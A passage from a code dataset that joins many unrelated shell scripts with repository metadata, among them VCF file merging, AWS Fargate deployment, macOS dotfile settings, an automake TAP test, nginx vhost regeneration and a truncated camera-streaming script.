input2_name=$input2_prefix$i$input2_suffix
output_prefix="phase_convert_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input_name |sort -k2,2| join -t$'\t' -1 2 -2 1 - <(cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input2_name | sort -k1,1) | awk -F $'\t' ' { t = $1; $1 = $2; $2 = t; print; } ' OFS=$'\t' | sort -nk2 > $output_name
done
for i in {1..22}
do
input_prefix="10x_phased_chr"
input_suffix=".vcf"
input_name=$input_prefix$i$input_suffix
input2_prefix="NA12878_gold_pos_chr"
input2_suffix=".vcf"
input2_name=$input2_prefix$i$input2_suffix
output_prefix="10x_phased_gold_pos_chr"
output_suffix=".vcf"
output_name=$output_prefix$i$output_suffix
cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input_name |sort -k2,2| join -t$'\t' -1 2 -2 1 - <(cat /scail/u/xzhou15/CancerProj_10X/whatshap_results/usegold/$input2_name | sort -k1,1) | awk -F $'\t' ' { t = $1; $1 = $2; $2 = t; print; } ' OFS=$'\t' | sort -nk2 > $output_name
done
# Concatenate the 22 per-chromosome gold-position files (in chromosome
# order, which brace expansion preserves) and prepend the saved VCF
# headers to produce the final phased VCFs.
cat phase_convert_gold_pos_chr{1..22}.vcf > phase_convert_gold_pos_all.vcf
cat 10x_phased_gold_pos_chr{1..22}.vcf > 10x_phased_gold_pos_all.vcf
cat header1.vcf 10x_phased_gold_pos_all.vcf > 10x_phased_gold_pos.vcf
cat header2.vcf phase_convert_gold_pos_all.vcf > phase_convert_gold_pos.vcf
| true
|
3fe5f8a2bb54bd64bf757249939244b796cbecfa
|
Shell
|
doubleq23/gitrepolazu
|
/shellscripts/list-access-keys.sh
|
UTF-8
| 140
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
# List the AWS IAM access keys for every user named in the file
# PRODENG-2753-users (one username per line).
# FIX: replaced `for i in $(cat file)` -- which word-splits and globs --
# with a line-oriented read loop, and quoted the username everywhere.
while IFS= read -r user
do
	echo "Checking user $user"
	aws iam list-access-keys --user-name "$user" --profile=awsdevus
done < PRODENG-2753-users
| true
|
bf086368a092485b7381f31de0ed5bcc588f7a47
|
Shell
|
guluguluchui/Custom_Debian_Set
|
/filesystem_set.sh
|
UTF-8
| 1,792
| 2.796875
| 3
|
[] |
no_license
|
#! /usr/bin/sh
#kernel_version
kernel_version=3.8.13-bone68
filesystem_path=./tmp
kernel_deploy=~/workspace/AM335x/eewiki/deploy
#uEnv.txt
sudo sh -c "echo 'uname_r=${kernel_version}' > ${filesystem_path}/boot/uEnv.txt"
sudo sh -c "echo 'optargs=quiet capemgr.enable_partno=BB-UART1,BB-UART2,BB-UART4,BB-SPIDEV1,BB-I2C1,BB-ADC init=/lib/systemd/systemd' >> ${filesystem_path}/boot/uEnv.txt"
#kernel, dtbs, modules, firmware
sudo cp -v ${kernel_deploy}/${kernel_version}.zImage ${filesystem_path}/boot/vmlinuz-${kernel_version}
sudo mkdir -p ${filesystem_path}/boot/dtbs/${kernel_version}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-dtbs.tar.gz -C ${filesystem_path}/boot/dtbs/${kernel_version}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-modules.tar.gz -C ${filesystem_path}/
sudo tar xfv ${kernel_deploy}/${kernel_version}-firmware.tar.gz -C ${filesystem_path}/lib/firmware/
#fstab
sudo sh -c "echo '/dev/mmcblk0p1 / auto errors=remount-ro 0 1' >> ${filesystem_path}/etc/fstab"
#inittab
sudo sh -c "echo 'T0:23:respawn:/sbin/getty -L ttyO0 115200 vt102' >> ${filesystem_path}/etc/inittab"
#eMMC-flasher
sudo cp -v ~/workspace/AM335x/eewiki/bbb-eMMC-flasher-eewiki-ext4.sh ${filesystem_path}/root/
#etc/network/interfaces
sudo mv ${filesystem_path}/etc/network/interfaces ${filesystem_path}/etc/network/backup_interfaces
sudo sh -c "echo '# interfaces(5) file used by ifup(8) and ifdown(8)' > ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'auto lo' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'allow-hotplug eth0' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'iface eth0 inet dhcp' >> ${filesystem_path}/etc/network/interfaces"
sudo sh -c "echo 'iface lo inet loopback' >> ${filesystem_path}/etc/network/interfaces"
| true
|
200b4762eb7b659328fb2f88fe9b897376e2787d
|
Shell
|
hlmuludiang/dotfiles
|
/zsh/plugins/macos.zsh
|
UTF-8
| 667
| 2.734375
| 3
|
[] |
no_license
|
# macOS-only zsh setup: UTF-8 locale, Homebrew GNU tool paths, and a
# quiet man wrapper. Entire block is skipped on other platforms.
if [[ $OSTYPE == darwin* ]]; then
  export LC_ALL=en_US.UTF-8
  export LANG=en_US.UTF-8
  export HOMEBREW_NO_ANALYTICS=1
  # zsh array assignment: prepend to the tied $manpath/$path arrays.
  manpath=(/usr/local/share/man /usr/share/man "$manpath[@]")
  # Prefer the unprefixed GNU variants of the core tools over BSD ones.
  for pkg in coreutils diffutils findutils gawk gnu-sed gnu-tar grep; do
    path=(/usr/local/opt/"${pkg}"/libexec/gnubin "$path[@]")
    manpath=(/usr/local/opt/"${pkg}"/libexec/gnuman "$manpath[@]")
  done
  path=(
    "$DOTFILES/scripts/macos"
    /usr/local/opt/curl/bin
    /usr/local/opt/sqlite/bin
    /usr/local/sbin
    "$path[@]"
  )
  # Wrapper silences man's stderr noise (e.g. missing-page warnings).
  man() {
    /usr/bin/man "$@" 2> /dev/null
  }
  # presumably full-update is a helper from another plugin that registers
  # update steps -- TODO confirm.
  full-update add brew-update
fi
| true
|
dddfd1f25030f3d78c7e042feddbb3d49a2d6f9f
|
Shell
|
Praqma/questionnaire-models
|
/scripts/create_service.sh
|
UTF-8
| 1,648
| 3.9375
| 4
|
[
"MIT"
] |
permissive
|
# How to use this script:
# source /scripts/create_service.sh <service-name> <image-tag> <environment> <db-uri>
# source /scripts/create_service.sh aws-qe-deploy praqma/questionaire-engine:0.1.0 test "mongodb://praqmadb:..."
# ATTENTION: the grep command requires the -P or -G flag for regex to work on this CI server - might throw error on different linux versions
SERVICE_NAME=$1
IMAGE_TAG=$2
ENV=$3
create_service() {
# Deploy IMAGE_TAG as a new AWS Fargate service named SERVICE_NAME,
# forwarding DB_PASSWORD_PROD from the caller's environment, port 80.
echo "Creating service. This will take a while..."
fargate service create $SERVICE_NAME --image $IMAGE_TAG --env DB_PASSWORD_PROD=$DB_PASSWORD_PROD --env PORT=80
}
check_service_status() {
# Print the running-task count (single digit) for the service, or
# nothing if the info line is absent.
# NOTE(review): grep -P is GNU-specific (see header comment); this
# breaks on BSD/macOS grep.
fargate service info $SERVICE_NAME | grep -oP 'Running: \d' | grep -oP '\d'
}
get_ip() {
# Extract the first dotted-quad IPv4 address from the service info.
fargate service info $SERVICE_NAME | grep -oG '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
}
# Bash auto-increments SECONDS; reset it here so the timeout below
# measures elapsed time since this point.
SECONDS=0
wait_for_ip() {
  # Poll the Fargate service every 10s until one task reports Running,
  # then print its IP. Exits the (sourced) shell with status 1 after
  # roughly 5 minutes without success.
  if [ "$SERVICE_NAME" == "" ]; then
    echo "SERVICE_NAME not found. Did you source your env vars?"
  fi
  # FIX: RUNNING is now local and initialized (the old [[ $RUNNING -ne 1 ]]
  # arithmetic-compared an unset variable), comparisons are quoted, and
  # the unreachable 'break' after 'exit 1' is gone.
  local RUNNING=""
  while [ "$RUNNING" != "1" ]
  do
    RUNNING=$(check_service_status)
    if [ "$RUNNING" == "1" ]; then
      echo "Server is running on IP $(get_ip)"
      break
    elif [ "$RUNNING" == "0" ]; then
      echo "[i] Server is starting up..."
    else
      echo "[!] Could not read service status."
    fi
    sleep 10s
    # time out after 5 minutes (300 seconds)
    if [ "$SECONDS" -gt 300 ]
    then
      echo "[!] Timed out - server could not be started."
      exit 1
    fi
  done
}
# Deploy image to AWS Fargate
create_service
# Ping server until it boots up
wait_for_ip
# Return IP of the running server
# NOTE(review): 'export VAR=$(cmd)' masks the command's exit status.
export IP=$(get_ip)
| true
|
714181c5e522ba2edc8490468e9bf77957700b6b
|
Shell
|
robcn/personalrobots-pkg
|
/stacks/trex/trex_pr2/test/createTmaps.sh
|
UTF-8
| 368
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Recreate symlinks in trex_pr2/test pointing at the shared willow maps.
echo "Create topomap symlinks."
# Resolve the two package roots once instead of twice per file, and use
# $() instead of backticks; paths are quoted in case they contain spaces.
TREX_TEST_DIR="$(rospack find trex_pr2)/test"
MAPS_DIR="$(rospack find willow_maps)"
# Intentionally unquoted below: FILES is a whitespace-separated list.
FILES="willow.tmap.outlet_overrides.xml willow.tmap.door_overrides.xml willow.tmap"
for file in $FILES ; do
	rm -f "$TREX_TEST_DIR/$file"
	echo "ln -s $MAPS_DIR/$file $TREX_TEST_DIR/$file"
	ln -s "$MAPS_DIR/$file" "$TREX_TEST_DIR/$file"
done
| true
|
1dcec58a6a8f71de5dc8f6198adc5b6ab128fdac
|
Shell
|
tesujiro/qiita_tile38
|
/commands.sh
|
UTF-8
| 2,042
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
PROMPT="127.0.0.1:9851> "
# Print a fake interactive prompt plus the command, then feed the
# command to tile38-cli and let its response print to stdout.
exec_tile38_cli(){
	echo -n "$PROMPT"
	echo "$@"
	echo "$@" | tile38-cli
}
# Exported so pipeline subshells (e.g. `... | while read`) can call it.
export -f exec_tile38_cli
commands-1(){
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
DROP lunch
#
GET location me POINT 35.6581 139.6975
#
SET lunch ramen:A POINT 35.6586 139.6982
SET lunch gyudon:B POINT 35.6570 139.6967
SET lunch ramen:C POINT 35.6576 139.6948
SCAN lunch MATCH ramen* IDS
NEARBY lunch POINT 35.6581 139.6975 100
EOF
}
commands-2(){
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
DROP example
#
SET location me POINT 35.6581 139.6975
GET location me
SET example bounds:X BOUNDS 35.6578 139.6971 35.6581 139.6968
SET example bounds:Y BOUNDS 35.6572 139.6984 35.6575 139.6978
SET example bounds:Z BOUNDS 35.6590 139.6967 35.6594 139.6959
WITHIN example IDS CIRCLE 35.6581 139.6975 120
INTERSECTS example IDS CIRCLE 35.6581 139.6975 120
EOF
}
#commands-2 | tile38-cli
commands-2 | while read line
do
exec_tile38_cli "$line"
done
# Build a one-line GeoJSON object: {"type":TYPE,"coordinates":COORDS}.
# The awk stage strips '#' comments; the two tr stages delete tabs and
# newlines to flatten the here-doc into a single line, so the body's
# indentation must stay tab-based.
geoJson(){
	local TYPE=$1
	local COORDINATES=$2
	cat <<EOF | awk 'gsub(/#.*/,"")>=0' | tr -d '\t' | tr -d '\n'
	{
		"type":"$TYPE",
		"coordinates":$COORDINATES
	}
EOF
}
commands-3(){
local KEY=example
cat <<EOF | awk 'gsub(/#.*/,"")>=0'
DROP location
DROP $KEY
SET location me OBJECT $(geoJson Polygon [[[35.6590,139.6982],[35.6589,139.6978],[35.6577,139.6965],[35.6574,139.6964],[35.6572,139.6966],[35.6575,139.6973],[35.6580,139.6988],[35.6587,139.6984],[35.6590,139.6982]]])
SET $KEY polygon:P OBJECT $(geoJson Polygon [[[35.6587,139.6984],[35.6590,139.6983],[35.6589,139.6979],[35.6586,139.6980],[35.6587,139.6984]]])
SET $KEY polygon:Q OBJECT $(geoJson Polygon [[[35.6591,139.6967],[35.6595,139.6960],[35.6589,139.6958],[35.6586,139.6965],[35.6591,139.6967]]])
SET $KEY road:R OBJECT $(geoJson LineString [[35.6584,139.6954],[35.6567,139.6970]])
SET $KEY road:S OBJECT $(geoJson LineString [[35.6585,139.6994],[35.6575,139.6953]])
INTERSECTS $KEY IDS GET location me
EOF
}
commands-3 | while read line
do
exec_tile38_cli "$line"
done
| true
|
a4a1ce25c2878ae64d581b8170a2e0fa0926f89c
|
Shell
|
xakep666/build
|
/moduleconfigs/dtc/dtc.sh
|
UTF-8
| 1,594
| 2.6875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#
# Copyright (C) 2016 The EFIDroid Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ ! -z "$MODULE_ARCH" ];then
DTC_MAKE_ARGS="$DTC_MAKE_ARGS AR=${GCC_LINUX_TARGET_PREFIX}ar"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS AS=${GCC_LINUX_TARGET_PREFIX}as"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS CC=${GCC_LINUX_TARGET_PREFIX}gcc"
DTC_MAKE_ARGS="$DTC_MAKE_ARGS CXX=${GCC_LINUX_TARGET_PREFIX}g++"
DTC_MAKE_ARGS_STATIC="CFLAGS=\"-static\""
fi
Compile() {
    # Mirror the module sources into MODULE_OUT via relative symlinks,
    # then build dtc there. DTC_MAKE_ARGS is intentionally unquoted:
    # it is a whitespace-separated list of make variable assignments.
    "$TOP/build/tools/lns" -rf "$MODULE_DIR/" "$MODULE_OUT"
    if [ ! -z "$MODULE_ARCH" ];then
        # compile supported targets only
        "$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS libfdt
        "$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS $DTC_MAKE_ARGS_STATIC convert-dtsv0 dtc fdtdump fdtget fdtput
    else
        "$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS
    fi
}
Clean() {
    # NOTE(review): Compile's lns step appears to create "$MODULE_OUT/dtc"
    # as a directory/symlink, so the '-f' (regular file) test may never
    # be true and the clean may silently no-op -- confirm whether '-d'
    # was intended.
    if [ -f "$MODULE_OUT/dtc" ];then
        "$MAKEFORWARD" "$EFIDROID_MAKE" -C "$MODULE_OUT/dtc" $DTC_MAKE_ARGS clean
    fi
}
DistClean() {
    # Remove everything under the module's output directory.
    rm -Rf "$MODULE_OUT/"*
}
| true
|
7b512d6f57d052e557f11d48cd6a73507c8fecf5
|
Shell
|
toddabrahm/dotfiles
|
/.osx
|
UTF-8
| 9,307
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until `.osx` has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# # Menu bar: disable transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false
# # Menu bar: hide the useless Time Machine and Volume icons
defaults write com.apple.systemuiserver menuExtras -array "/System/Library/CoreServices/Menu Extras/Bluetooth.menu" "/System/Library/CoreServices/Menu Extras/AirPort.menu" "/System/Library/CoreServices/Menu Extras/Battery.menu" "/System/Library/CoreServices/Menu Extras/Clock.menu"
# Disable the “Are you sure you want to open this application?” dialog
defaults write com.apple.LaunchServices LSQuarantine -bool false
###############################################################################
# Trackpad, mouse, keyboard, Bluetooth accessories, and input #
###############################################################################
# Set a blazingly fast keyboard repeat rate
defaults write NSGlobalDomain KeyRepeat -int 0
# # Disable auto-correct
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
###############################################################################
# Screen #
###############################################################################
# Save screenshots to the desktop
defaults write com.apple.screencapture location -string "$HOME/Desktop"
# Save screenshots in PNG format (other options: BMP, GIF, JPG, PDF, TIFF)
defaults write com.apple.screencapture type -string "png"
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
# Enable subpixel font rendering on non-Apple LCDs
defaults write NSGlobalDomain AppleFontSmoothing -int 2
###############################################################################
# Finder #
###############################################################################
# Finder: disable window animations and Get Info animations
defaults write com.apple.finder DisableAllAnimations -bool true
# Finder: show hidden files by default
defaults write com.apple.Finder AppleShowAllFiles -bool true
# Finder: show all filename extensions
defaults write NSGlobalDomain AppleShowAllExtensions -bool true
# Finder: show status bar
defaults write com.apple.finder ShowStatusBar -bool true
# Finder: allow text selection in Quick Look
defaults write com.apple.finder QLEnableTextSelection -bool true
# Display full POSIX path as Finder window title
defaults write com.apple.finder _FXShowPosixPathInTitle -bool true
# # When performing a search, search the current folder by default
defaults write com.apple.finder FXDefaultSearchScope -string "SCcf"
# # Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Avoid creating .DS_Store files on network volumes
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool true
# Show item info below icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:showItemInfo true" ~/Library/Preferences/com.apple.finder.plist
# Enable snap-to-grid for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy grid" ~/Library/Preferences/com.apple.finder.plist
# Increase grid spacing for icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:gridSpacing 100" ~/Library/Preferences/com.apple.finder.plist
# Increase the size of icons on the desktop and in other icon views
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :FK_StandardViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:iconSize 80" ~/Library/Preferences/com.apple.finder.plist
# Use list view in all Finder windows by default
# Four-letter codes for the other view modes: `icnv`, `clmv`, `Flwv`
defaults write com.apple.Finder FXPreferredViewStyle -string "Nlsv"
# Disable the warning before emptying the Trash
defaults write com.apple.finder WarnOnEmptyTrash -bool false
# Empty Trash securely by default
defaults write com.apple.finder EmptyTrashSecurely -bool true
# Show the ~/Library folder
chflags nohidden ~/Library
###############################################################################
# Dock & hot corners #
###############################################################################
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Don’t show Dashboard as a Space
defaults write com.apple.dock dashboard-in-overlay -bool true
# Remove the auto-hiding Dock delay
defaults write com.apple.Dock autohide-delay -float 0
# Remove the animation when hiding/showing the Dock
defaults write com.apple.dock autohide-time-modifier -float 0
# Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
# Add iPhone Simulator.app to Launchpad
ln -s /Applications/Xcode.app/Contents/Applications/iPhone\ Simulator.app ~/Applications
###############################################################################
# Safari & WebKit #
###############################################################################
# # Set Safari’s home page to `about:blank` for faster loading
defaults write com.apple.Safari HomePage -string "about:blank"
# # Enable the Develop menu and the Web Inspector in Safari
defaults write com.apple.Safari IncludeDevelopMenu -bool true
defaults write com.apple.Safari WebKitDeveloperExtrasEnabledPreferenceKey -bool true
defaults write com.apple.Safari com.apple.Safari.ContentPageGroupIdentifier.WebKit2DeveloperExtrasEnabled -bool true
# # Add a context menu item for showing the Web Inspector in web views
defaults write NSGlobalDomain WebKitDeveloperExtras -bool true
###############################################################################
# Mail #
###############################################################################
# Copy email addresses as `foo@example.com` instead of `Foo Bar <foo@example.com>` in Mail.app
defaults write com.apple.mail AddressesIncludeNameOnPasteboard -bool false
###############################################################################
# Terminal #
###############################################################################
# # Only use UTF-8 in Terminal.app
defaults write com.apple.terminal StringEncodings -array 4
###############################################################################
# Address Book, Dashboard, iCal, TextEdit, and Disk Utility #
###############################################################################
# # Use plain text mode for new TextEdit documents
defaults write com.apple.TextEdit RichText -int 0
# # Open and save files as UTF-8 in TextEdit
defaults write com.apple.TextEdit PlainTextEncoding -int 4
defaults write com.apple.TextEdit PlainTextEncodingForWrite -int 4
###############################################################################
# Kill affected applications #
###############################################################################
for app in "Address Book" "Calendar" "Contacts" "Dock" "Finder" "Mail" \
"Safari" "SizeUp" "SystemUIServer" "Terminal" "Transmission" "Twitter" \
"iCal" "iTunes"; do
killall "$app" > /dev/null 2>&1
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
36d89a54a0b2b0aafdf16247c0b594deb3c39b5d
|
Shell
|
KatieMishra/VoiceClassification
|
/sphinxbase/autoconf-2.69/automake-1.14/t/tap-no-spurious-numbers.sh
|
UTF-8
| 1,874
| 3.3125
| 3
|
[
"GPL-2.0-or-later",
"GPL-1.0-or-later",
"GPL-2.0-only",
"GPL-3.0-only",
"FSFAP",
"GPL-3.0-or-later",
"Autoconf-exception-3.0",
"LicenseRef-scancode-other-copyleft",
"MIT",
"BSD-2-Clause"
] |
permissive
|
#! /bin/sh
# Copyright (C) 2011-2013 Free Software Foundation, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

# TAP support:
#  - we shouldn't spuriously recognize as TAP result numbers what it
#    not, even if it seems pretty close

. test-init.sh

. tap-setup.sh

# Each character below is placed right after "ok"/"not ok" to build lines
# that look *almost* like numbered TAP results but must not be parsed as such.
cat > prefixes <<'END'
A
a
_
+
-
=
/
*
.
:
,
;
$
@
%
&
#
?
!
|
\
"
`
'
(
)
[
]
{
}
<
>
END

n=$(wc -l <prefixes)

# See the loop below to understand this initialization.
pass=$(($n * 3))
fail=$pass
skip=$(($pass - 3))
xfail=$skip
xpass=$xfail
error=0
total=$(($pass + $fail + $skip + $xfail + $xpass))

echo 1..$total > all.test

# A bogus "result number" far larger than the number of lines in the test:
# if the TAP driver spuriously picked it up, the sanity check below and the
# result counts would expose it.
highno=1000

for result in 'ok' 'not ok'; do
  for spacing in "" " " "$tab"; do
    # BUG FIX: this previously used the misspelled "$higno" (undefined,
    # expands to empty), so no bogus number was appended at all and the
    # test did not exercise what it claims to.
    subst="$result &$spacing$highno"
    sed -e "s|.*|$subst|" prefixes
    for directive in TODO SKIP; do
      test "$result $directive" != "not ok SKIP" || continue
      sed -e '/^#$/d' -e "s|.*|$subst # $directive|" prefixes
    done
  done
done >> all.test

cat all.test # For debugging.

# Sanity checks.
grep '#.*#' all.test \
  && framework_failure_ "creating all.test"
test $(wc -l <all.test) -lt $highno \
  || framework_failure_ "creating all.test"

run_make -O -e IGNORE check
count_test_results total=$total pass=$pass fail=$fail skip=$skip \
  xpass=$xpass xfail=$xfail error=$error

:
| true
|
abacee45dc763029a120b440325d3af1ffc9b871
|
Shell
|
qnyblog/lempstack
|
/menu/controller/ssl/remove
|
UTF-8
| 4,605
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
######################################################################
# Auto Install & Optimize LEMP Stack on CentOS 7, 8 #
# #
# Author: Sanvv - HOSTVN Technical #
# Website: https://hostvn.vn #
# #
# Please do not remove copyright. Thank! #
# Please do not copy under any circumstance for commercial reason! #
######################################################################
# shellcheck disable=SC2154
# shellcheck disable=SC2034
source /var/hostvn/menu/validate/rule
source /var/hostvn/menu/helpers/function
printf "%s=================%s\n" "${GREEN}" "${NC}"
printf "%sGo bo SSL tra phi%s\n" "${GREEN}" "${NC}"
printf "%s=================%s\n" "${GREEN}" "${NC}"
echo
edit_vhost(){
# Append a plain HTTP (port 80) PHP vhost for ${domain} to the site's
# nginx config. Shell variables (${user}, ${domain}, ${fastcgi_pass},
# ${root}, ${rewrite}, ${brute}, ${wp_secure}, ${xmlrpc}) are expanded by
# the unquoted heredoc; nginx runtime variables are backslash-escaped
# (\$uri, \$document_root, ...) so they reach the file literally.
# NOTE(review): "server ${fastcgi_pass}" carries no trailing ';' —
# presumably ${fastcgi_pass} already ends with one; verify in fastcgi().
cat >> "${VHOST_DIR}/${domain}.conf" << END
upstream php-${user} {
server ${fastcgi_pass}
}
server {
listen 80;
server_name ${domain} www.${domain};
#access_log off;
#access_log /home/${user}/${domain}/logs/access.log;
#error_log off;
error_log /home/${user}/${domain}/logs/error.log;
${root}
index index.php index.html index.htm;
${rewrite}
location ~ \.php\$ {
try_files \$uri =404;
fastcgi_split_path_info ^(.+\.php)(/.+)\$;
fastcgi_index index.php;
include /etc/nginx/fastcgi_params;
include /etc/nginx/extra/nginx_limits.conf;
fastcgi_param SCRIPT_FILENAME \$document_root\$fastcgi_script_name;
if (-f \$request_filename)
{
fastcgi_pass php-${user};
}
}
${brute}
include /etc/nginx/extra/staticfiles.conf;
include /etc/nginx/extra/security.conf;
${wp_secure}
${xmlrpc}
}
END
}
edit_vhost_nodejs(){
    # Append a plain HTTP (port 80) reverse-proxy vhost for a Node.js app.
    # Requires ${VHOST_DIR}, ${domain}, ${user} and ${proxy_port} to be set
    # by the caller.
    #
    # BUG FIX: nginx runtime variables ($http_upgrade, $host) were not
    # backslash-escaped, so the shell expanded them to empty strings and the
    # generated proxy_set_header/proxy_cache_bypass directives were broken.
    # They are now escaped, matching the convention used in edit_vhost().
    cat >> "${VHOST_DIR}/${domain}.conf" << END
server {
    listen 80;
    #listen [::]:80;
    server_name ${domain} www.${domain};
    #access_log off;
    #access_log /home/${user}/${domain}/logs/access.log;
    #error_log off;
    error_log /home/${user}/${domain}/logs/error.log;
    root /home/${user}/${domain}/public_html;
    #index index.php index.html index.htm;
    location / {
        proxy_pass http://127.0.0.1:${proxy_port};
        proxy_http_version 1.1;
        proxy_set_header Upgrade \$http_upgrade;
        proxy_set_header Connection 'upgrade';
        proxy_set_header Host \$host;
        proxy_cache_bypass \$http_upgrade;
    }
    include /etc/nginx/extra/staticfiles.conf;
    include /etc/nginx/extra/security.conf;
}
END
}
_run(){
# Rebuild the plain-HTTP vhost for ${domain} (dropping the paid-SSL server
# block), then reload nginx if the generated config validates.
check_nginx_status
if [ -z "${ALERT}" ]; then
# Site metadata persisted by the panel under USER_DIR.
user=$(grep -w "username" "${USER_DIR}/.${domain}.conf" | cut -f2 -d'=');
php_mode="$(grep "php_mode" "${USER_DIR}/.${domain}.conf" | cut -f2 -d'=')"
select_source
doc_root "${SOURCE}" "${user}" "${domain}"
if [[ "${SOURCE}" == "wordpress" ]]; then
# WordPress hardening includes, xmlrpc blocking and brute-force rules.
wp_secure="include /etc/nginx/wordpress/wordpress_secure.conf;"
xmlrpc="include /etc/nginx/wordpress/disable_xmlrpc.conf;"
brute_force_wp "${user}"
fi
# Drop the old vhost before regenerating it.
rm -rf /etc/nginx/conf.d/"${domain}".conf
set_rewrite
fastcgi
if [ "${SOURCE}" == "nodejs" ]; then
# Node.js sites proxy to a local port; ask the operator for it.
while true
do
read -r -p "Nhap Port Nodejs: " proxy_port
if valid_number "${proxy_port}"; then
break
else
clear
printf "%s\n" "${RED}Port khong chinh xac, vui long nhap lai.${NC}"
fi
done
edit_vhost_nodejs
else
edit_vhost
fi
# Only reload nginx when the generated configuration passes "nginx -t".
if nginx -t; then
systemctl reload nginx
clear
printf "%sGo bo SSL thanh cong.%s\n" "${GREEN}" "${NC}"
if [[ "${SOURCE}" == "wordpress" ]]; then
printf "%s\n" "${GREEN}Luu y: Ban can cau hinh lai Plugins cache va Plugins Seo tai menu 7-7${NC}"
fi
echo ""
else
printf "%s\n" "${RED}Cau hinh Nginx khong chinh xac. Vui long kiem tra lai${NC}"
fi
else
clear
printf "%s\n" "${ALERT}"
fi
}
# Entry point: let the operator pick a domain, then rebuild its vhost
# without the paid SSL configuration.
ALERT=""
domain=""
select_domain
if [[ -z "${domain}" && -z "${ALERT}" ]]; then
# Operator cancelled the domain selection.
clear
printf "%s\n" "${RED}Ban da chon huy thao tac${NC}"
else
if [ -z "${ALERT}" ]; then
_run
else
clear
printf "%s\n" "${ALERT}"
fi
fi
# Return to the paid-SSL menu when done.
menu_sslpaid
| true
|
b9bf61cfdd5894c39f6cb796ede617aa5050c27a
|
Shell
|
bartt/henhouse
|
/ustream
|
UTF-8
| 324
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Stream the Raspberry Pi camera to an RTMP server (e.g. Ustream).
# Usage: ustream RTMP-URL STREAM-KEY
RTMP_URL=$1
STREAM_KEY=$2
if [[ -z $RTMP_URL || -z $STREAM_KEY ]]; then
echo "usage: ustream RTMP-URL STREAM-KEY"
exit 1
fi
# Capture 960x540 @ 25fps H.264 (flipped both ways, no preview, no time
